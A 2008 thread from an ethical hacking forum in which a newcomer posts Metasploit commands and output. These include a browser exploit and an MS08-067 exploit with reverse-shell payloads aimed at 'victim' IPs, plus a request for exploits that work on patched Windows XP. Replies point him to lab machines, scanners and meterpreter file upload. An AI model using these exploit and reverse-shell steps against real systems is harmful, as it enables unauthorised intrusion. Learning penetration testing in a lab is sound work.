Home
Calendar
Certifications
Columns
Features
Forum
Resources
Vitals
Latest Additions
April 2013 Free Giveaway Sponsor - eLearnSecurity
Human Intelligence to Navigate the Security Data Deluge
February 2013 Free Giveaway Winner of SANS CyberCon Training
Interview: Bugcrowd Founders on Herding Ninjas for Crowdsourced Bug Bounties
Network Forensics: The Tree in the Forest
March 2013 Free Giveaway Sponsor - Mile2
Book Review: Violent Python
February 2013 Free Giveaway Sponsor - SANS
Holiday 2012 Free Giveaway Winner of Metasploit Pro by Rapid7
Course Review: SANS FOR408 Computer Forensic Investigations – Windows In-Depth
The Security Consulting Sugar High
Tutorial: Fun with SMB on the Command Line
Interview: Ilia Kolochenko, CEO of High-Tech Bridge
October 2012 Free Giveaway Winner of LearningGate Training
The Broken: Assessing Corporate Security in 2012 to Make a Better 2013
EH-Net Login
Welcome Guest.
Username:
Password:
Remember me
Lost Password?
No account yet?
Register
Who's Online
We have 76 guests and 2 members online
Free Business and Tech Magazines and eBooks
You are here:
Home
Resources
Tutorials
problem with use MSF
EH-Net
May 18, 2013, 05:44:35 PM
Welcome,
Guest
. Please
login
or
register
.
Did you miss your
activation email?
1 Hour
1 Day
1 Week
1 Month
Forever
Login with username, password and session length
News
: Go back to The Ethical Hacker Network Online Magazine
Home Page
Home
Help
Calendar
Login
Register
EH-Net
>
Resources
>
Tutorials
(Moderator:
don
) >
problem with use MSF
Pages: [
1
]
2
Go Down
« previous
next »
Print
Author
Topic: problem with use MSF (Read 20885 times)
0 Members and 1 Guest are viewing this topic.
mr.Z
Newbie
Offline
Posts: 12
problem with use MSF
«
on:
November 14, 2008, 01:15:15 PM »
I have some problem with use metasploit
i'm test more exploit but not sucss I'don't wht problem
look this example
use windows/browser/ani_loadimage_chunksize
set SRVHOST myip
set SRVPORT 8000
set URIPATH nono
set payload windows/shell_reverse_tcp
set LHOST ip victim
>exploit
Started reverse handler
Using URL:
http://ip:8000/nono
Server started.
after i'm test this on OS xp sp and IE 7 ,IE 6
after tell me
Sending HTML page to ip:6668...
Sending ANI file to ip:6668...
i'm wating but nothing happen
>> sessions -l
Active sessions===============No active sessions.
what problem >>>
any idea?
and can any one give me some exploit working on xp sp2 and sp3
«
Last Edit: November 14, 2008, 01:23:38 PM by mr.Z
»
Logged
BillV
Hero Member
Offline
Posts: 1892
Re: problem with use MSF
«
Reply #1 on:
November 14, 2008, 01:45:48 PM »
Sounds like it's not vulnerable.
Logged
mr.Z
Newbie
Offline
Posts: 12
Re: problem with use MSF
«
Reply #2 on:
November 14, 2008, 01:58:36 PM »
thanx
but i'm show target
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
and i'm test on 7 pc's seam problem
Logged
BillV
Hero Member
Offline
Posts: 1892
Re: problem with use MSF
«
Reply #3 on:
November 14, 2008, 03:29:02 PM »
Just because those are listed as targets, doesn't mean they're vulnerable... just what the exploit can attack.
Logged
mr.Z
Newbie
Offline
Posts: 12
Re: problem with use MSF
«
Reply #4 on:
November 14, 2008, 04:55:02 PM »
ok thanx
but can give me some name exploit working on win xp sp1,sp2,sp3,vista
and I want exploit use without send the url to victim
I'm using MSF under windows xp
Logged
BillV
Hero Member
Offline
Posts: 1892
Re: problem with use MSF
«
Reply #5 on:
November 14, 2008, 10:09:28 PM »
Quote from: mr.Z on November 14, 2008, 04:55:02 PM
I'm using MSF under windows xp
There's your first problem. Run it under Linux.
I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
Logged
LSOChris
Guest
Re: problem with use MSF
«
Reply #6 on:
November 14, 2008, 10:26:36 PM »
ms08-067 exploit
Logged
mr.Z
Newbie
Offline
Posts: 12
Re: problem with use MSF
«
Reply #7 on:
November 16, 2008, 01:37:18 PM »
Quote from: BillV on November 14, 2008, 10:09:28 PM
Quote from: mr.Z on November 14, 2008, 04:55:02 PM
I'm using MSF under windows xp
There's your first problem. Run it under Linux.
I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
thanx alot now i'm work in linux and update msf
----
ChrisG
thanx
I'm test this exploit but show me message problem
Started bind handler
[-] Exploit failed: The connection timed out (ip-vicitm:4444).
Exploit completed, but no session was created.
why this not work what problem
but no session was created?
plz tell me
Logged
apollo
Full Member
Offline
Posts: 146
Re: problem with use MSF
«
Reply #8 on:
November 16, 2008, 10:47:54 PM »
You probably aren't vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
Logged
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
mr.Z
Newbie
Offline
Posts: 12
Re: problem with use MSF
«
Reply #9 on:
November 17, 2008, 09:25:08 AM »
Quote from: apollo on November 16, 2008, 10:47:54 PM
You probably aren't vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch
any more Idea?
Logged
BillV
Hero Member
Offline
Posts: 1892
Re: problem with use MSF
«
Reply #10 on:
November 17, 2008, 12:37:59 PM »
Quote from: mr.Z
any more Idea?
Yes, I think you need to do more research and studying regarding exploits and how metasploit works.
I suggest you
start here
.
BillV
Logged
apollo
Full Member
Offline
Posts: 146
Re: problem with use MSF
«
Reply #11 on:
November 17, 2008, 05:06:25 PM »
I'll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus. There is another option for you to google which is db_autopwn. If you search for that, and you use backtrack3 things will get easier for you. If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate. If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.
Logged
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
geekyone
Full Member
Offline
Posts: 180
Re: problem with use MSF
«
Reply #12 on:
November 17, 2008, 08:05:25 PM »
Quote from: mr.Z on November 17, 2008, 09:25:08 AM
You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch
any more Idea?
Your biggest problem is trying to exploit a fully patched windows xp box with metasploit. If you want to learn more about metasploit and practice pen testing techniques don't attack a fully patched box in your lab.
Metasploit doesn't have any zero day vulnerabilities included in it (currently) so you are never going to be able to successfully exploit a fully patched box with metasploit right now. Now if you really want to exploit a fully patched xp box you should take Billv's suggestion to heart because that is going to involve getting into zero day vulnerability research. Which requires an in depth understanding of how exploits work. If you want to get into that I recommend starting by reading
Hacking: The Art of Exploitation, 2nd Edition
.
Logged
CISSP, CEH, GPEN, GCIH, GCFA
mr.Z
Newbie
Offline
Posts: 12
Re: problem with use MSF
«
Reply #13 on:
November 22, 2008, 01:37:48 PM »
THANK YOU ALL
now i'm install windows xp witout servies pack
and exploit this windows
i'm use paylod
>"windows/shell_reverse_tcp"
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
but I cant upload some file i'm using this msf under linux
test some command like this
>copy /root/xx.txt c:\
but not succss the error msg
>copy /root/xx.txt c:\
The syntax of the command is incorrect
Logged
xXxKrisxXx
Hero Member
Offline
Posts: 512
Re: problem with use MSF
«
Reply #14 on:
November 22, 2008, 01:47:51 PM »
If your getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP Server on your Linux box, when requesting the files using tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp Payload and use the upload from there, it's quicker. The meterpreter also has alot of other useful options as well.
Logged
eCPPT, GCIH, OSCP, OSWP
Pages: [
1
]
2
Go Up
Print
« previous
next »
Jump to:
Please select a destination:
-----------------------------
EH-Net
-----------------------------
=> Calendar Of Events
===> ChicagoCon 2007
===> ChicagoCon 2008s
===> ChicagoCon 2008f
===> ChicagoCon 2009s
=> Ethical Hacktivism
=> News Items and General Discussion About EH-Net
===> Greetings
=> Special Events
-----------------------------
Ethical Hacking Discussions and Related Certifications
-----------------------------
=> General Certification
===> Networking
===> OS
===> Security
=> Compliance, Regulations & Standards
=> Control Systems
=> Cyber Warfare
=> Forensics
===> CCE / MCCE - (Master) Certified Computer Examiner
===> CHFI - Computer Hacking Forensic Investigator
===> EnCE - EnCase® Certified Examiner
===> GCFA - GIAC Certified Forensics Analyst
=> Hardware
=> Incident Response
===> CSIH - Computer Security Incident Handler
===> GCIH - GIAC Certified Incident Handler
=> Malware
===> Advisories
=> Mobile
=> Network Pen Testing
===> CEH - Certified Ethical Hacker
===> CPTC - Certified Penetration Testing Consultant
===> CPTE - Certified Penetration Testing Engineer
===> CSTA - Certified Security Testing Associate
===> eCPPT - eLearnSecurity Certified Professional Penetration Tester
===> ECSA - EC-Council Certified Security Analyst
===> GPEN - GIAC Certified Penetration Tester
===> OSCP - Offensive Security Certified Professional
=> Physical Security
=> Programming
=> Social Engineering
=> Web Applications
=> Wireless
===> CWNP Certs
===> GAWN - GIAC Assessing Wireless Networks
===> OSWP - Offensive Security Wireless Professional
=> Other
-----------------------------
Columns
-----------------------------
=> Editor-In-Chief
=> Andress
=> Gates
=> Haddix
=> Hadnagy
=> Heffner
=> Hoffman
=> Linn
=> RichM
=> Murray
=> J. Peltier
=> Weidman
=> Wilson
-----------------------------
Features
-----------------------------
=> /root
=> Book Reviews
=> Opinions
=> Skillz
===> Examples
===> May 06 - Star Hacks, Episode V: The Empire Hacks Back
===> July 06 - Hack Bill!
===> Sept 06 - Netcat in the Hat
===> Nov 06 - Hitch-Hackers Guide to the Galaxy
===> Dec 06 - A Christmas (Hacking) Story
===> Feb 07 - Charlottes Web Site
===> April 07 - Microsoft Office Space
===> June 07 - Serenity Hack
===> Oct 07 - Worst. Ethical. Hacker. Challenge. Ever.
===> Dec 07 - Frosty the Snow Crash
===> March 2008 - It Happened One Friday
===> Oct 2008 - Scooby Doo and the Crypto Caper
===> Dec 08 - Santa Claus Is Hacking to Town
===> Feb 2009 - Brady Bunch Boondoggle
===> July 2009 - Prison Break
===> October 2009 - SSHliders
===> December 2009 - Miracle on Thirty-Hack Street
===> December 2010 - The Nightmare Before Charlie Browns Christmas
-----------------------------
Resources
-----------------------------
=> Career Central
===> Looking For Work
===> Looking To Hire
=> Links to cool sites.
=> Mass Media
=> News from the Outside World
=> Tools
=> Tutorials
===> Tutorial Requests
Loading...
Exclusive Deal
SANSFIRE 2013
June 15 - 22
5% Off
w/ Code
:
EHN_5
SANS Deals 4 EH-Netters
5% OFF
Any
SANS Course
in Any Format!
Coupon Code:
EHN_5
Including
SANS Rocky Mountain 2013
&
SANS Boston 2013
Polls
Compared to this year, 2013 will be:
Great!
Better.
About the same.
Little worse.
FUBAR!
Recent Forum Topics
General Certification
: CPT Practical Submission
(0) by
z28power4u
OSCP - Offensive Security Certified Professional
: Class Scheduled 6/8 - Linux n00b
(5) by
MrTuxracer
Career Central
: Starter cert?
(0) by
Alert
Web Applications
: Nessus and Nikto
(4) by
Seen
Tutorials
: Need guidance
(7) by
impelse
Malware
: EICAR?
(2) by
SephStorm
Network Pen Testing
: Cracking salted MD5 hash
(4) by
n37sh@rk
CEH - Certified Ethical Hacker
: Passed my C|EH
(3) by
n37sh@rk
Mass Media
: EC-council hacked, irony at his best?
(0) by
j0rDy
Web Applications
: SQL Injection into an INSERT statement.
(6) by
eyenit0
Network Pen Testing
: Solution for sipXtapi INVITE Message CSeq Field Header Remote Overflow
(1) by
m0wgli
Web Applications
: dns
(2) by
H1t M0nk3y
Other
: BSides Boston
(0) by
3xban
Career Central
: InfoSec in Central, FL
(2) by
tturner
Web Applications
: Web vulnerability scanner
(4) by
H1t M0nk3y
EH-Net News Feeds
Latest Additions
Privacy Notice
for TDCC & All Properties
© 2013 The Ethical Hacker Network
Joomla!
is Free Software released under the GNU/GPL License.